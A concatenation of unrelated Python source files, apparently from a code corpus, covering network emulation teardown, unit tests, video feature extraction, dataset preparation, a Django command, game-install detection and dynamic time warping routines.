return self.topo.get_num_sw_ports()
def get_num_hosts(self):
return self.topo.get_num_hosts()
def start_network(self):
# Start Mininet
self.net = Mininet(topo=self.topo, controller=None, autoSetMacs=True)
self.net.start()
self._config_network(self.net)
self.net_stopped = False
def stop_network(self):
if not self.net_stopped:
self.net_stopped = True
log.info("Removing interfaces and restoring all network state.")
if self.tcp_policy == "dctcp":
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=0")
# reset the active host congestion control to the previous value
cmd = "sysctl -w net.ipv4.tcp_congestion_control=%s" % self.prev_cc
dc_utils.exec_process(cmd)
log.info("Deleting the virtual network")
self.net.stop()
log.info("Successfully deleted the virtual network")
|
56673
|
import unittest
from descriptastorus import MolFileIndex
import os, shutil
import logging
import datahook
TEST_DIR = "test1"
class TestCase(unittest.TestCase):
def setUp(self):
if os.path.exists(TEST_DIR):
shutil.rmtree(TEST_DIR, ignore_errors=True)
index = self.index = MolFileIndex.MakeSmilesIndex(
os.path.join(datahook.datadir, "../data/test1.smi"), TEST_DIR, hasHeader=True,
smilesColumn="smiles", nameColumn="name")
def tearDown(self):
if os.path.exists(TEST_DIR):
shutil.rmtree(TEST_DIR, ignore_errors=True)
def testIndexing(self):
logging.info("Running index test")
self.assertEqual(self.index.N, 14)
self.assertEqual(self.index.getMol(12), 'c1ccccc1CCCCCCCCCCCC')
self.assertEqual(self.index.getName(12), '13')
self.assertEqual(self.index.getRDMol(13), None)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
56702
|
import os
import sys
import argparse
import time
parser = argparse.ArgumentParser()
parser.add_argument('-gpu', default='0', type=str)
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"]=args.gpu
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torchvision
from torchvision import datasets, transforms
#import videotransforms
from torchsummary import summary
import numpy as np
import pkbar
from apmeter import APMeter
import x3d_fine
from charades_fine import Charades
from charades_fine import mt_collate_fn as collate_fn
from transforms.spatial_transforms import Compose, Normalize, RandomHorizontalFlip, MultiScaleRandomCrop, MultiScaleRandomCropMultigrid, ToTensor, CenterCrop, CenterCropScaled
from transforms.temporal_transforms import TemporalRandomCrop
from transforms.target_transforms import ClassLabel
import warnings
warnings.filterwarnings("ignore")
BS = 1
BS_UPSCALE = 1
INIT_LR = 0.02 * BS_UPSCALE
X3D_VERSION = 'M'
CHARADES_MEAN = [0.413, 0.368, 0.338]
CHARADES_STD = [0.131, 0.125, 0.132]
CHARADES_TR_SIZE = 7900
CHARADES_VAL_SIZE = 1850
CHARADES_ROOT = '/data/add_disk0/kumarak/Charades_v1_rgb'
CHARADES_ANNO = 'data/charades.json'
FINE_SAVE_DIR = '/nfs/bigcornea/add_disk0/kumarak/fine_spatial7x7'
# pre-extract fine features and save here, to reduce compute req
# MAKE DIRS FINE_SAVE_DIR/['layer1', 'layer2', 'layer3', 'layer4', 'conv5']
feat_keys = ['layer1', 'layer2', 'layer3', 'layer4', 'conv5']
for k in feat_keys:
if not os.path.exists(os.path.join(FINE_SAVE_DIR,k)):
os.makedirs(os.path.join(FINE_SAVE_DIR,k))
# 0.00125 * BS_UPSCALE --> 80 epochs warmup 2000
def run(init_lr=INIT_LR, warmup_steps=0, max_epochs=100, root=CHARADES_ROOT,
train_split=CHARADES_ANNO, batch_size=BS*BS_UPSCALE, frames=80, save_dir= FINE_SAVE_DIR):
crop_size = {'S':160, 'M':224, 'XL':312}[X3D_VERSION]
resize_size = {'S':[180.,225.], 'M':[256.,256.], 'XL':[360.,450.]}[X3D_VERSION] #[256.,320.]
gamma_tau = {'S':6, 'M':5*1, 'XL':5}[X3D_VERSION] # 5
load_steps = st_steps = steps = 0
epochs = 0
num_steps_per_update = 1
cur_iterations = steps * num_steps_per_update
iterations_per_epoch = CHARADES_TR_SIZE//(batch_size*1)
val_iterations_per_epoch = CHARADES_VAL_SIZE//(batch_size)
max_steps = iterations_per_epoch * max_epochs
val_spatial_transforms = Compose([CenterCropScaled(crop_size),
ToTensor(255),
Normalize(CHARADES_MEAN, CHARADES_STD)])
# SET 'TESTING' FOR BOTH, TO EXTRACT
dataset = Charades(train_split, 'testing', root, val_spatial_transforms,
task='loc', frames=frames, gamma_tau=gamma_tau, crops=1, extract_feat=True)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, shuffle=True,
num_workers=8, pin_memory=True, collate_fn=collate_fn)
val_dataset = Charades(train_split, 'testing', root, val_spatial_transforms,
task='loc', frames=frames, gamma_tau=gamma_tau, crops=1, extract_feat=True)
val_dataloader = torch.utils.data.DataLoader(val_dataset, batch_size=batch_size, shuffle=False,
num_workers=8, pin_memory=True, collate_fn=collate_fn)
dataloaders = {'train': dataloader, 'val': val_dataloader}
datasets = {'train': dataset, 'val': val_dataset}
print('train',len(datasets['train']),'val',len(datasets['val']))
print('Total iterations:', max_steps, 'Total epochs:', max_epochs)
print('datasets created')
fine_net = x3d_fine.generate_model(x3d_version=X3D_VERSION, n_classes=400, n_input_channels=3, task='loc',
dropout=0.5, base_bn_splits=1, global_tower=True)
fine_net.replace_logits(157)
load_ckpt = torch.load('models/fine_charades_039000_SAVE.pt')
state = fine_net.state_dict()
state.update(load_ckpt['model_state_dict'])
fine_net.load_state_dict(state)
fine_net.cuda()
fine_net = nn.DataParallel(fine_net)
print('model loaded')
lr = init_lr
print ('LR:%f'%lr)
optimizer = optim.SGD(fine_net.parameters(), lr=lr, momentum=0.9, weight_decay=1e-5)
lr_sched = optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', patience=3, factor=0.1, verbose=True)
if steps>0:
optimizer.load_state_dict(load_ckpt['optimizer_state_dict'])
lr_sched.load_state_dict(load_ckpt['scheduler_state_dict'])
criterion = nn.BCEWithLogitsLoss()
val_apm = APMeter()
tr_apm = APMeter()
while epochs < max_epochs:
print ('Step {} Epoch {}'.format(steps, epochs))
print ('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train']+['val']:
bar_st = iterations_per_epoch if phase == 'train' else val_iterations_per_epoch
bar = pkbar.Pbar(name='update: ', target=bar_st)
fine_net.train(False) # Set model to evaluate mode
# FOR EVAL AGGREGATE BN STATS
_ = fine_net.module.aggregate_sub_bn_stats()
torch.autograd.set_grad_enabled(False)
tot_loss = 0.0
tot_loc_loss = 0.0
tot_cls_loss = 0.0
tot_dis_loss = 0.0
tot_acc = 0.0
tot_corr = 0.0
tot_dat = 0.0
num_iter = 0
optimizer.zero_grad()
# Iterate over data.
print(phase)
for i,data in enumerate(dataloaders[phase]):
#for data in dataloaders[phase]:
num_iter += 1
bar.update(i)
inputs, labels, masks, name = data
b,n,c,t,h,w = inputs.shape
inputs = inputs.view(b*n,c,t,h,w)
inputs = inputs.cuda() # B 3 T W H
tl = labels.size(2)
labels = labels.cuda() # B C TL
masks = masks.cuda() # B TL
valid_t = torch.sum(masks, dim=1).int()
feat,_ = fine_net([inputs, masks]) # N C T 1 1
keys = list(feat.keys())
print(i, name[0], feat[keys[0]].cpu().numpy().shape, feat[keys[1]].cpu().numpy().shape,
feat[keys[2]].cpu().numpy().shape, feat[keys[3]].cpu().numpy().shape, feat[keys[4]].cpu().numpy().shape)
for k in feat:
torch.save(feat[k].data.cpu(), os.path.join(save_dir, k, name[0]))
break
if __name__ == '__main__':
run()
|
56708
|
def entry_id(entry):
for field in ['id', 'link']:
ret = getattr(entry, field, None)
if ret:
return ret
raise Exception('no id field found in entry: {}'.format(entry))
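# Minimal sketch (assumes a feedparser-style entry object; names are illustrative):
#
#   from types import SimpleNamespace
#   entry = SimpleNamespace(id=None, link='https://example.com/post/1')
#   assert entry_id(entry) == 'https://example.com/post/1'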
|
56710
|
import os
from py.path import local
import pypy
from pypy.tool.udir import udir
from pypy.translator.c.test.test_genc import compile
from pypy.rpython import extregistry
import errno
import sys
import py
def getllimpl(fn):
return extregistry.lookup(fn).lltypeimpl
def test_access():
filename = str(udir.join('test_access.txt'))
fd = file(filename, 'w')
fd.close()
for mode in os.R_OK, os.W_OK, os.X_OK, os.R_OK | os.W_OK | os.X_OK:
result = getllimpl(os.access)(filename, mode)
assert result == os.access(filename, mode)
def test_times():
"""
posix.times should compile as an RPython function and should return a
five-tuple giving float-representations (seconds, effectively) of the four
fields from the underlying struct tms and the return value.
"""
times = compile(lambda: os.times(), ())()
assert isinstance(times, tuple)
assert len(times) == 5
for value in times:
assert isinstance(value, float)
def test__getfullpathname():
if os.name != 'nt':
py.test.skip('nt specific function')
posix = __import__(os.name)
sysdrv = os.getenv('SystemDrive', 'C:')
stuff = sysdrv + 'stuff'
data = getllimpl(posix._getfullpathname)(stuff)
assert data == posix._getfullpathname(stuff)
# the most intriguing failure of ntpath.py should not repeat, here:
assert not data.endswith(stuff)
def test_getcwd():
data = getllimpl(os.getcwd)()
assert data == os.getcwd()
def test_strerror():
data = getllimpl(os.strerror)(2)
assert data == os.strerror(2)
def test_system():
filename = str(udir.join('test_system.txt'))
arg = 'python -c "print 1+1" > %s' % filename
data = getllimpl(os.system)(arg)
assert data == 0
assert file(filename).read().strip() == '2'
os.unlink(filename)
EXECVE_ENV = {"foo": "bar", "baz": "quux"}
execve_tests = str(local(__file__).dirpath().join('execve_tests.py'))
def test_execve():
if os.name != 'posix':
py.test.skip('posix specific function')
base = " ".join([
sys.executable,
execve_tests,
str(local(pypy.__file__).join('..', '..')),
''])
# Test exit status and code
result = os.system(base + "execve_true")
assert os.WIFEXITED(result)
assert os.WEXITSTATUS(result) == 0
result = os.system(base + "execve_false")
assert os.WIFEXITED(result)
assert os.WEXITSTATUS(result) == 1
# Test environment
result = os.popen(base + "execve_env").read()
assert dict([line.split('=') for line in result.splitlines()]) == EXECVE_ENV
# These won't actually execute anything, so they don't need a child process
# helper.
execve = getllimpl(os.execve)
# If the target does not exist, an OSError should result
info = py.test.raises(
OSError, execve, execve_tests + "-non-existent", [], {})
assert info.value.errno == errno.ENOENT
# If the target is not executable, an OSError should result
info = py.test.raises(
OSError, execve, execve_tests, [], {})
assert info.value.errno == errno.EACCES
class ExpectTestOs:
def setup_class(cls):
if not hasattr(os, 'ttyname'):
py.test.skip("no ttyname")
def test_ttyname(self):
import os
import py
from pypy.rpython.test.test_llinterp import interpret
def ll_to_string(s):
return ''.join(s.chars)
def f(num):
try:
return os.ttyname(num)
except OSError:
return ''
assert ll_to_string(interpret(f, [0])) == f(0)
assert ll_to_string(interpret(f, [338])) == ''
|
56722
|
class Solution:
def minStartValue(self, nums: List[int]) -> int:
total = minSum = 0
for num in nums:
total += num
minSum = min(minSum, total)
return 1 - minSum
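# Worked example (illustrative input): for nums = [-3, 2, -3, 4, 2] the running
# prefix sums are -3, -1, -4, 0, 2, so minSum = -4 and the minimum positive
# start value is 1 - (-4) = 5.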
|
56738
|
import os
import random
import shutil
# We need to change the dataset so that it is split into train/validation/test
# portions, and labelled with a single attribute (e.g. 'color').
attributes = ('color', 'number', 'shape', 'shading', 'all')
attribute_label_extraction_fns = {
'number': lambda dir: dir.split('-')[0],
'color': lambda dir: dir.split('-')[1],
'shading': lambda dir: dir.split('-')[2],
'shape': lambda dir: dir.split('-')[3].rstrip('s'), # remove trailing 's'
'all': lambda dir: dir
}
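# Worked example (directory names are assumed to follow "number-color-shading-shapes",
# e.g. "1-red-striped-diamonds"): 'number' -> "1", 'color' -> "red",
# 'shading' -> "striped", 'shape' -> "diamond" (trailing 's' stripped), and
# 'all' keeps the full directory name as the label.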
def copyfile(src_dir, dest_dir, file):
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
shutil.copyfile(os.path.join(src_dir, file), os.path.join(dest_dir, file))
def create_split_datasets(dataset_dir, target_dir, label_extract_fn,
train_split_percent, validation_split_percent, test_split_percentage):
dirs = []
for (dirpath, dirnames, filenames) in os.walk(dataset_dir):
dirs.extend(dirnames)
break
target_train_dir = os.path.join(target_dir, 'train')
target_validation_dir = os.path.join(target_dir, 'validation')
target_test_dir = os.path.join(target_dir, 'test')
for dir in dirs:
subdir = os.path.join(dataset_dir, dir)
files = os.listdir(subdir)
random.shuffle(files)
i1 = int(len(files) * train_split_percent / 100)
i2 = int(len(files) * (train_split_percent + validation_split_percent) / 100)
train, validation, test = files[:i1], files[i1:i2], files[i2:]
label = label_extract_fn(dir)
for file in train:
copyfile(subdir, os.path.join(target_train_dir, label), file)
for file in validation:
copyfile(subdir, os.path.join(target_validation_dir, label), file)
for file in test:
copyfile(subdir, os.path.join(target_test_dir, label), file)
def create_single_attribute_test_dataset(dataset_dir, target_dir, label_extract_fn):
dirs = []
for (dirpath, dirnames, filenames) in os.walk(dataset_dir):
dirs.extend(dirnames)
break
for dir in dirs:
files = os.listdir(os.path.join(dataset_dir, dir))
label = label_extract_fn(dir)
for file in files:
copyfile(os.path.join(dataset_dir, dir), os.path.join(target_dir, label),
file)
for attribute in attributes:
create_split_datasets('data/train-v2/labelled', f'data/{attribute}',
attribute_label_extraction_fns[attribute],
70, 20, 10)
create_single_attribute_test_dataset('data/test-v2', f'data/{attribute}-test',
attribute_label_extraction_fns[attribute])
# Create an artificially small training dataset to observe overfitting
create_split_datasets('data/train-v2/labelled', f'data/shape-small',
attribute_label_extraction_fns['shape'],
1, 20, 79)
|
56787
|
import logging
import os
from django.conf import settings
from django.core.management.base import BaseCommand
from core.management.commands import configure_logging
from core.models import Batch, OcrDump
configure_logging("dump_ocr_logging.config", "dump_ocr.log")
_logger = logging.getLogger(__name__)
class Command(BaseCommand):
help = "looks for batches that need to have ocr dump files created"
def handle(self, *args, **options):
if not os.path.isdir(settings.OCR_DUMP_STORAGE):
os.makedirs(settings.OCR_DUMP_STORAGE)
for batch in Batch.objects.filter(ocr_dump__isnull=True):
_logger.info("starting to dump ocr for %s", batch)
try:
if batch.ocr_dump:
_logger.info("Ocr is already generated for %s", batch)
continue
except OcrDump.DoesNotExist:
pass
dump = OcrDump.new_from_batch(batch)
_logger.info("created ocr dump %s for %s", dump, batch)
|
56788
|
import os
import codecs
from setuptools import setup, find_packages
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
def read(*path):
full_path = os.path.join(PROJECT_ROOT, *path)
with codecs.open(full_path, 'r', encoding='utf-8') as f:
return f.read()
setup(
name='django-envsettings',
version='1.1.0',
author='<NAME>',
author_email='<EMAIL>',
url='http://github.com/evansd/django-envsettings',
packages=find_packages(exclude=['tests*']),
license='MIT',
description="One-stop shop for configuring 12-factor Django apps",
long_description=read('README.rst'),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
)
|
56820
|
from definitions import SYSTEM, System, GameStatus
import os
import asyncio
import logging as log
from consts import UBISOFT_REGISTRY_LAUNCHER_INSTALLS
if SYSTEM == System.WINDOWS:
import winreg
def _get_registry_value_from_path(top_key, registry_path, key):
with winreg.OpenKey(top_key, registry_path, 0, winreg.KEY_READ) as winkey:
return winreg.QueryValueEx(winkey, key)[0]
def _return_local_game_path_from_special_registry(special_registry_path):
if not special_registry_path:
        return ""  # no registry path to check; treat as not installed
try:
install_location = _get_registry_value_from_path(winreg.HKEY_LOCAL_MACHINE, special_registry_path,
"InstallLocation")
return install_location
except WindowsError:
# Entry doesn't exist, game is not installed.
return ""
except Exception as e:
log.warning(f"Unable to read special registry status for {special_registry_path}: {repr(e)}")
return ""
def _return_local_game_path(launch_id):
installs_path = UBISOFT_REGISTRY_LAUNCHER_INSTALLS
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, installs_path):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, installs_path + f'\\{launch_id}') as lkey:
game_path, _ = winreg.QueryValueEx(lkey, 'InstallDir')
return os.path.normcase(os.path.normpath(game_path))
except OSError:
                return ""  # no registry entry for this launch_id
except WindowsError:
return "" # Game not installed / during installation
def get_local_game_path(special_registry_path, launch_id):
local_game_path = _return_local_game_path(launch_id)
if not local_game_path and special_registry_path:
local_game_path = _return_local_game_path_from_special_registry(special_registry_path)
return local_game_path
async def get_size_at_path(start_path):
total_size = 0
for dirpath, dirnames, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
if not os.path.islink(fp):
total_size += os.path.getsize(fp)
await asyncio.sleep(0)
return total_size
def _is_file_at_path(path, file):
if os.path.isdir(path):
file_location = os.path.join(path, file)
if os.path.isfile(file_location):
return True
return False
else:
return False
def _read_status_from_state_file(game_path):
try:
if os.path.exists(os.path.join(game_path, 'uplay_install.state')):
with open(os.path.join(game_path, 'uplay_install.state'), 'rb') as f:
if f.read()[0] == 0x0A:
return GameStatus.Installed
else:
return GameStatus.NotInstalled
            # State file doesn't exist
else:
return GameStatus.NotInstalled
except Exception as e:
log.warning(f"Issue reading install state file for {game_path}: {repr(e)}")
return GameStatus.NotInstalled
def get_game_installed_status(path, exe=None, special_registry_path=None):
status = GameStatus.NotInstalled
try:
if path and os.access(path, os.F_OK):
status = _read_status_from_state_file(path)
# Fallback for old games
if status == GameStatus.NotInstalled and exe and special_registry_path:
if _is_file_at_path(path, exe):
status = GameStatus.Installed
except Exception as e:
log.error(f"Error reading game installed status at {path}: {repr(e)}")
finally:
return status
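# Minimal usage sketch (hypothetical launch id and exe name; Windows-only, since the
# registry helpers above rely on winreg):
if __name__ == "__main__":
    path = get_local_game_path(special_registry_path=None, launch_id="123")
    print(get_game_installed_status(path, exe="game.exe"))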
|
56845
|
import unittest
from test.test_utils import get_repository
from unittest.mock import Mock
from autopr.database import Database
class DatabaseTest(unittest.TestCase):
def test_needs_pulling_empty(self):
db = Database()
self.assertTrue(db.needs_pulling())
def test_needs_pulling_not_empty(self):
db = Database(user=Mock())
self.assertFalse(db.needs_pulling())
def test_reset_empty(self):
db = Database(user=Mock(), repositories=[])
db.reset()
self.assertEqual(0, len(db.repositories))
def test_reset_non_empty(self):
repo_first = get_repository("first")
repo_first.done = True
repo_second = get_repository("second")
db = Database(
user=Mock(),
repositories=[
repo_first,
repo_second,
],
)
self.assertTrue(db.repositories[0].done)
self.assertFalse(db.repositories[1].done)
db.reset()
self.assertFalse(db.repositories[0].done)
self.assertFalse(db.repositories[1].done)
def test_merge_into(self):
db_first = Database(
user=Mock(),
repositories=[
get_repository("first"),
get_repository("second"),
],
)
db_second = Database(
user=Mock(),
repositories=[
get_repository("third"),
get_repository("fourth"),
],
)
db_first.merge_into(db_second)
self.assertEqual(4, len(db_first.repositories))
self.assertEqual("first", db_first.repositories[0].name)
self.assertEqual("fourth", db_first.repositories[3].name)
def test_repositories_to_process(self):
db = Database(
user=Mock(),
repositories=[
get_repository("removed", removed=True),
get_repository("done", done=True),
get_repository("non-removed"),
],
)
repositories = db.repositories_to_process()
self.assertEqual(1, len(repositories))
self.assertEqual("non-removed", repositories[0].name)
if __name__ == "__main__":
unittest.main()
|
56859
|
import json
import jieba
import pickle
import csv, h5py
import pandas as pd
import numpy as np
from tqdm import *
import torch
from torch import Tensor
from torch.autograd import Variable
import torch.utils.data as data
from main import Hyperparameters
from collections import Counter
STOP_TAG = "#stop#"
UNK_TAG = "#unk#"
def filter(ret, min_count):
count = pd.Series(ret).value_counts()
count = count[count >= min_count]
char_set = list(count.index)
return char_set
def get_vocab(param):
ret = []
with open(param.train_json_path) as f:
for line in tqdm(f):
line = json.loads(line)
if len(line['answer_docs']) == 0 or len(line['fake_answers']) == 0:
continue
document = line['documents'][line['answer_docs'][0]]
paragraph = document['paragraphs'][document['most_related_para']]
for p in paragraph: ret.append(p)
ret = filter(ret, param.min_count)
ret = sorted(list(ret))
input_set = [STOP_TAG, UNK_TAG]
input_set.extend(list(ret))
input_set_size = len(input_set)
input2idx = dict(zip(input_set, range(input_set_size)))
    print('Vocabulary size:', input_set_size, '\n')
return input2idx, input_set_size
def save_vocab(path, input2idx):
    print('Saving vocabulary...')
f = open(path,'wb')
pickle.dump(input2idx, f)
f.close()
def load_vocab(path):
print('Loading vocabulary...')
f = open(path, 'rb')
input2idx = pickle.load(f)
input_set = list(input2idx.keys())
input_set_size = len(input_set)
f.close()
    print('Vocabulary size:', input_set_size, '\n')
return input2idx, input_set_size
# ------------------ save h5py file --------------------------- #
def load_evidence_and_feats(evidence, feats, input2idx):
evidence_vector = []
feats_vector = []
for e, f in zip(evidence, feats):
if e in input2idx:
evidence_vector.append(input2idx[e])
feats_vector.append(f)
return evidence_vector, feats_vector, len(evidence_vector)
def pad_sequence(seq, seq_size, word2idx):
vector = []
for i in range(seq_size):
if i >= len(seq):
vector.append(word2idx[STOP_TAG])
elif seq[i] not in word2idx:
vector.append(word2idx[UNK_TAG])
else:
vector.append(word2idx[seq[i]])
if len(seq) < seq_size:
length = len(seq)
else:
length = seq_size
return vector, length
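# Worked example (hypothetical vocabulary): with word2idx = {STOP_TAG: 0, UNK_TAG: 1, '苏': 2},
# pad_sequence('苏x', 4, word2idx) returns ([2, 1, 0, 0], 2): unknown characters map to UNK_TAG,
# the sequence is padded with STOP_TAG up to seq_size, and the original length 2 is preserved.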
def save_data(file, param, data, shape, i):
if i <= param.batch_storage_size:
for key, value in data.items():
if value == []: continue
file.create_dataset(key, data = value, maxshape = shape[key])
else:
old_len = len(file['question'])
new_len = old_len + len(data['question'])
for key, value in data.items():
if value == []: continue
new_shape = [new_len]
for s in shape[key][1:]:
new_shape.append(s)
file[key].resize(new_shape)
file[key][old_len: new_len] = value
print(i)
def get_train_data(param, line):
document = line['documents'][line['answer_docs'][0]]
#paragraph = document['paragraphs'][document['most_related_para']]
segmented_paragraph = document['segmented_paragraphs'][document['most_related_para']]
paragraph = ''.join(segmented_paragraph)
if len(paragraph) > param.paragraph_size:
return [], [], []
paragraph, paragraph_length = pad_sequence(paragraph, param.paragraph_size, param.word2idx)
answer_span = line['answer_spans'][0]
fake_answer = line['fake_answers'][0]
answer_start = len(''.join(segmented_paragraph[:answer_span[0]]))
answer_end = len(''.join(segmented_paragraph[:answer_span[1]+1]))
answer = [answer_start, answer_end]
return paragraph, paragraph_length, answer
def get_val_data(param, line):
paragraphs, paragraph_lengths, answers = [], [], []
documents = line['documents']
question_tokens = line['segmented_question']
for d in documents:
para_infos = []
for para_tokens in d['segmented_paragraphs']:
common_with_question = Counter(para_tokens) & Counter(question_tokens)
correct_preds = sum(common_with_question.values())
if correct_preds == 0:
recall_wrt_question = 0
else:
recall_wrt_question = float(correct_preds) / len(question_tokens)
para_infos.append((para_tokens, recall_wrt_question, len(para_tokens)))
para_infos.sort(key=lambda x: (-x[1], x[2]))
fake_paragraph = ''.join(para_infos[0][0])
if (len(fake_paragraph)) > param.paragraph_size:
continue
fake_paragraph, fake_paragraph_length = pad_sequence(fake_paragraph, param.paragraph_size, param.word2idx)
paragraphs.append(fake_paragraph)
paragraph_lengths.append(fake_paragraph_length)
answers = line['answers']
return paragraphs, paragraph_lengths, answers
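# Note: for each document, the paragraph with the highest token recall w.r.t. the question
# (ties broken by shorter paragraph length) is selected as the fake paragraph; e.g. a paragraph
# sharing 3 of 6 question tokens gets recall 0.5 and beats one sharing 2 of 6.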
def save_h5py_file(param, old_path, new_path):
print('Saving (', new_path, ')...')
file = h5py.File(new_path,'w')
data = {'question_id':[], 'question_type':[], 'question':[], 'question_length':[],
'paragraph':[], 'answer':[], 'paragraph_length':[], 'paragraphs':[], 'paragraph_lengths':[]}
shape = {'question_id':(None,), 'question_type':(None,), 'question':(None, param.question_size), 'question_length':(None,),
'paragraph':(None, param.paragraph_size), 'answer':(None, 2), 'paragraph_length':(None,),
'paragraphs':(None, None, param.paragraph_size), 'paragraph_lengths':(None, None,)}
#evaluate = {}
i = 0
with open(old_path) as f:
for line in tqdm(f):
line = json.loads(line)
documents = line['documents']
question = line['question']
question_id = line['question_id']
question_type = line['question_type']
question_tokens = line['segmented_question']
if len(question) > param.question_size:
continue
# train
if old_path == param.train_json_path:
if len(line['answer_docs']) == 0 or len(line['fake_answers']) == 0:
continue
paragraph, paragraph_length, answer = get_train_data(param, line)
if paragraph == []: continue
data['paragraph'].append(paragraph)
data['paragraph_length'].append(paragraph_length)
data['answer'].append(answer)
# val
elif old_path == param.val_json_path:
paragraphs, paragraph_lengths, answers = get_val_data(param, line)
if paragraphs == []: continue
data['paragraphs'].append(paragraphs)
data['paragraph_lengths'].append(paragraph_lengths)
#data['answers'].append(answers)
data['question_id'].append(question_id)
question, question_length = pad_sequence(question, param.question_size, param.word2idx)
data['question'].append(question)
data['question_length'].append(question_length)
# ---------------------------------
i += 1
if i % param.batch_storage_size == 0:
save_data(file, param, data, shape, i)
data = {'question_id':[], 'question_type':[], 'question':[], 'question_length':[],
'paragraph':[], 'answer':[], 'paragraph_length':[], 'paragraphs':[], 'paragraph_lengths':[]}
if i % param.batch_storage_size != 0:
save_data(file, param, data, shape, i)
file.close()
print('Dataset: ', i)
def get_answer():
with open(param.val_json_path) as f:
for line in tqdm(f):
line = json.loads(line)
question_id = line['question_id']
answers = line['answers']
if __name__ == '__main__':
param = Hyperparameters()
# 5143
#word2idx, word_set_size = get_vocab(param)
#idx2word = dict(zip(word2idx.values(), word2idx.keys()))
#print(word2idx['苏'], idx2word[520])
#save_vocab(param.vocab_path, word2idx)
param.word2idx, param.vocab_size = load_vocab(param.vocab_path)
param.idx2word = dict(zip(param.word2idx.values(), param.word2idx.keys()))
#print(word2idx['苏'], idx2word[520])
#save_h5py_file(param, param.train_json_path, param.train_h5py_path)
save_h5py_file(param, param.val_json_path, param.val_h5py_path)
|
56864
|
import librosa
from numba import jit
import numpy as np
@jit(nopython=True, cache=True)
def __C_to_DE(C: np.ndarray = None,
dn: np.ndarray = np.array([1, 1, 0], np.int64),
dm: np.ndarray = np.array([1, 0, 1], np.int64),
dw: np.ndarray = np.array([1.0, 1.0, 1.0], np.float64),
sub_sequence: bool = False) -> (np.ndarray, np.ndarray):
"""This function computes the accumulated cost matrix D and the step index
matrix E.
Parameters
----------
C : np.ndarray (np.float32 / np.float64) [shape=(N, M)]
Cost matrix
dn : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (N direction of C), default: [1, 1, 0]
dm : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (M direction of C), default: [1, 0, 1]
dw : np.ndarray (np.float64) [shape=(1, S)]
Double array defining the weight of the each step, default: [1.0, 1.0, 1.0]
sub_sequence : bool
Set `True` for SubSequence DTW, default: False
Returns
-------
D : np.ndarray (np.float64) [shape=(N, M)]
Accumulated cost matrix of type double
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix.
E[n, m] holds the index of the step take to determine the value of D[n, m].
If E[n, m] is zero, no valid step was possible.
NaNs in the cost matrix are preserved, invalid fields in the cost matrix are NaNs.
"""
if C is None:
raise ValueError('C must be a 2D numpy array.')
N, M = C.shape
S = dn.size
if S != dm.size or S != dw.size:
raise ValueError('The parameters dn,dm, and dw must be of equal length.')
# calc bounding box size of steps
sbbn = np.max(dn)
sbbm = np.max(dm)
# initialize E
E = np.zeros((N, M), np.int64) - 1
# initialize extended D matrix
D = np.ones((sbbn + N, sbbm + M), np.float64) * np.inf
if sub_sequence:
for m in range(M):
D[sbbn, sbbm + m] = C[0, m]
else:
D[sbbn, sbbm] = C[0, 0]
# accumulate
for m in range(sbbm, M + sbbm):
for n in range(sbbn, N + sbbn):
for s in range(S):
cost = D[n - dn[s], m - dm[s]] + C[n - sbbn, m - sbbm] * dw[s]
if cost < D[n, m]:
D[n, m] = cost
E[n - sbbn, m - sbbm] = s
D = D[sbbn: N + sbbn, sbbm: M + sbbm]
return D, E
@jit(nopython=True, cache=True)
def __E_to_warping_path(E: np.ndarray,
dn: np.ndarray = np.array([1, 1, 0], np.int64),
dm: np.ndarray = np.array([1, 0, 1], np.int64),
sub_sequence: bool = False,
end_index: int = -1) -> np.ndarray:
"""This function computes a warping path based on the provided matrix E
and the allowed steps.
Parameters
----------
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix
dn : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (N direction of C), default: [1, 1, 0]
dm : np.ndarray (np.int64) [shape=(1, S)]
Integer array defining valid steps (M direction of C), default: [1, 0, 1]
sub_sequence : bool
Set `True` for SubSequence DTW, default: False
end_index : int
In case of SubSequence DTW
Returns
-------
warping_path : np.ndarray (np.int64) [shape=(2, M)]
Resulting optimal warping path
"""
N, M = E.shape
if not sub_sequence and end_index == -1:
end_index = M - 1
m = end_index
n = N - 1
warping_path = np.zeros((2, n + m + 1))
index = 0
def _loop(m, n, index):
warping_path[:, index] = np.array([n, m])
step_index = E[n, m]
m -= dm[step_index]
n -= dn[step_index]
index += 1
return m, n, index
if sub_sequence:
while n > 0:
m, n, index = _loop(m, n, index)
else:
while m > 0 or n > 0:
m, n, index = _loop(m, n, index)
warping_path[:, index] = np.array([n, m])
warping_path = warping_path[:, index::-1]
return warping_path
def compute_warping_path(C: np.ndarray,
step_sizes: np.ndarray = np.array([[1, 0], [0, 1], [1, 1]], np.int64),
step_weights: np.ndarray = np.array([1.0, 1.0, 1.0], np.float64),
implementation: str = 'synctoolbox'):
"""Applies DTW on cost matrix C.
Parameters
----------
C : np.ndarray (np.float32 / np.float64) [shape=(N, M)]
Cost matrix
step_sizes : np.ndarray (np.int64) [shape=(2, S)]
Array of step sizes
step_weights : np.ndarray (np.float64) [shape=(2, S)]
Array of step weights
implementation: str
Choose among ``synctoolbox`` and ``librosa``. (default: ``synctoolbox``)
Returns
-------
D : np.ndarray (np.float64) [shape=(N, M)]
Accumulated cost matrix
E : np.ndarray (np.int64) [shape=(N, M)]
Step index matrix
wp : np.ndarray (np.int64) [shape=(2, M)]
Warping path
